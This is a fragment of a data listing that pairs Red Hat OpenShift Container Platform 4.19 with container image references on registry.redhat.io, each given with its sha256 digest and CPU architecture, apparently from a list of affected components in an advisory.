"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
